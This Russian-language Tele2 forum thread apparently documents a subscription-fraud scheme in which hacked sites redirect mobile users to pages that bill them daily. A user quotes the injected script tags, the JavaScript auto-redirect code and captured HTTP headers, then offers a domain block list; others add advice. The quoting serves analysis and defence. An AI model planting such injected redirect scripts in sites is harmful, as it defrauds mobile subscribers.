Форум Tele2

[Tevil2]

Интродакшен

Регулярно-иногда, при заходе на некоторые ГС-ы браузер перебрасывает на страницы типа


После этого, начинают списывать деньги 30р. в день. Естественно, никаких услуг никто не просит, не получает и ТП ничего вразумительного объяснить не может. В общем, уходит куча нервов. Первый скриншот сделал буквально сегодня, причём перебросило меня на это дерьмо с сайта который никакого отношения к Tele2 не имеет, кроме, разве что, его просто взломали близкие к Tele2 товарищи.

Кому интересно, пример кода для подгрузки скрипта на взломаную страницу:

<script async src='http://pow2go.innabondar.ru/script.php?fn=1&id=98'></script><script type="text/javascript" src="http://goo.gl/Lbph1d"></script>

Гугловский укротитель ссылок перебрасывает на http://kwizzy.biz/?type=js&key=d7c07259de920ee который при наличии Куки отгружает заразу:

aggNavigateWithReferrer('http://mbsrv.ru/?SID=99665a96-1c41-fd5e-5776-204a1e8b69ec');
function aggNavigateWithReferrer(url) {
var redirect_form = document.createElement('form');
redirect_form.setAttribute('action',url);
redirect_form.setAttribute('method','get');
if (typeof(document.body) == 'undefined' || document.body == null){
window.location.replace('http://mbsrv.ru/?SID=99665a96-1c41-fd5e-5776-204a1e8b69ec');
window.location.href = 'http://mbsrv.ru/?SID=99665a96-1c41-fd5e-5776-204a1e8b69ec';
return;
}
document.body.appendChild(redirect_form); redirect_form.submit();
var redirect_link = document.createElement('a');
if (typeof(redirect_link.click) == 'undefined') location.href = url;
else { redirect_link.href = url; document.body.appendChild(redirect_link); redirect_link.click(); }
}

Пример заголовков с редиректом

Connection: keep-alive

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 05 Feb 2016 19:03:45 GMT
Location: http://kwizzy.biz/?type=js&key=d7c07259de920ee
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 197
Server: GSE
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Age: 256
----------------------------------------------------------
http://kwizzy.biz/?type=js&key=d7c07259de920ee

GET /?type=js&key=d7c07259de920ee HTTP/1.1
Host: kwizzy.biz
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://forum.orsk.ru/index.php?showuser=42715
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Fri, 05 Feb 2016 19:08:53 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.20
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: success_domain=mirreview.ru; expires=Fri, 12-Feb-2016 19:08:07 GMT
Set-Cookie: cancel_domain=http%3A%2F%2Fforum.orsk.ru%2Findex.php%3Fshowuser%3D42715; expires=Fri, 12-Feb-2016 19:08:07 GMT
Set-Cookie: open=1; expires=Sat, 06-Feb-2016 19:08:07 GMT
Set-Cookie: steep_58308=2; expires=Sat, 06-Feb-2016 19:08:08 GMT
Pragma: no-cache
Expires: Sun, 06 Mar 2016 19:08:08 GMT
Cache-Control: max-age=2592000, private
X-app-Server: 192.168.41.129
Content-Encoding: gzip
----------------------------------------------------------
http://mbsrv.ru/?SID=fb3306d3-b3f8-ace9-7000-e6b59f65cadd

GET /?SID=fb3306d3-b3f8-ace9-7000-e6b59f65cadd HTTP/1.1
Host: mbsrv.ru
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://forum.orsk.ru/index.php?showuser=42715
Connection: keep-alive

HTTP/1.1 302 Found
Server: nginx/1.8.0
Date: Fri, 05 Feb 2016 19:08:10 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: private
Location: /?SID=fb3306d3-b3f8-ace9-7000-e6b59f65cadd&AspxAutoDetectCookieSupport=1
X-AspNet-Version: 4.0.30319
Set-Cookie: AspxAutoDetectCookieSupport=1; path=/
X-Powered-By: ASP.NET
X-Frame-Options: DENY

Предлагаю

Во-первых - не лениться и когда вас перебрасывает на эту хрень, сразу отправлять сообщение о мошенничестве средствами браузера. Эта фишка доступна через меню в Опере, Fx и Chrome.

Во-вторых - составлять список этого дерьма для персональной блокировки браузера.

http://*alltop100.org*
http://*initsubscribe*
http://*kwizzy.biz*
http://*mbsrv.ru*
http://*mirreview.ru*

[kilopolo]

Спасибо.

[7kot]

Хороший разбор полётов. Добавил ссылку на этот пост в свой разбор: http://der-appetit.livejournal.com/270730.html

[mnogo999]

Ещё filegenerator.net

Вопрос: Знает ли кто подписку для блокировщиков рекламы (AdblockPlus и т.д. - RuAdlist и подобные), которая содержит обновляемый чёрный список подобных страниц-ловушек?
(Уж очень много стало их в интернете, часто попадаются, вручную все не успеешь вычислить и добавить).

[Yejik]

Можно просто на постоянку включить впн. Любой. И все подобные сайты вас не пасценивают как елиента мобильного оператора и ничего ненавешивают. Ну ивторой вариант перейти на оператора у которого подобные ловушки в принципе невозможны.
А составлять списки и обмениваться ими как то напряжно.

[Wonnanie]

Очень полезная тема, спасибо)